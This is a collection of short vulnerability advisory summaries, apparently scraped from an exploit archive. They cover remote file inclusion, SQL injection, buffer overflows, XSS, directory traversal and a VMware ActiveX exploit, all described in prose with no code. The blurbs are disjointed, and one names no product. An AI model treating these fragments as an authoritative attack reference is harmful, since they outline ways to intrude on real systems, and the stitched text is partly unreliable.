It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.
Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory.
This exploit will overflow and execute calc.exe on WinXP Pro SP2 (fully patched) against VMWare 5.5.1 Initialize ActiveX member. The exploit uses a bad solution to this bug, where a huge buffer is filled with the address (pointer) to the evil buffer, which then trampolines to shellcode.
The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect. Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.
Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. The vulnerability is caused by a buffer overflow error when the FTP client processes a server banner of excessive length. A malicious attacker can exploit this vulnerability by sending a specially crafted FTP server banner to the target user.
EServ is a web server that does not sufficiently prevent web users from being able to view directory indexes. This may result in disclosure of sensitive information. An attacker can send a GET request to the web server to view the directory index.
A malicious NASL script can break outside of the established sandbox environment and execute arbitrary commands on the local system. This is possible due to a buffer overflow vulnerability in the 'libnasl' library used by the Nessus application. The malicious script must be a legitimate plugin that has been uploaded to the Nessus server and the affected Nessus application must have enabled the 'plugins_upload' option.
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. Specifically, excessive data passed as the 'file' argument to the vulnerable Polymorph executable, when copied into internal memory, may overrun the boundary of the assigned buffer and corrupt adjacent memory. This vulnerability may be exploited to execute arbitrary attacker-supplied code.
XMB Forum fails to adequately filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be included in a malicious link to a specific XMB Forum script. This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users of a host running XMB Forum.
A directory traversal vulnerability has been reported for Example.com. It is reported that the vulnerability is due to insufficient sanitization of user-supplied input to the 'protected' directory. This may allow a remote attacker to gain access to sensitive files outside of the web root.
Services By CQR